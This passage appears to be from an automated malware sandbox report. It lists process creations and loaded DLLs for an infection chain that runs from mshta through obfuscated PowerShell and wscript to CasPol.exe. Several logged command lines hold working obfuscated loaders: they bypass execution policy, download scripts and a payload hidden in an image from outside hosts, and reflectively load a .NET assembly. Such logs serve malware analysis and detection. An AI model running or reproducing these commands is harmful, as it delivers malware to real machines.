[Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                    Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.cmdline"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES883E.tmp" "c:\Users\user\AppData\Local\Temp\2c1bgmxj\CSC89B293BFADB94B3BBFCBA07F5ADB38CA.TMP"
                    Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: mshtml.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msiso.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msimtf.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: jscript9.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msls31.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d2d1.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dwrite.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d3d11.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d3d10warp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dxcore.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dataexchange.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
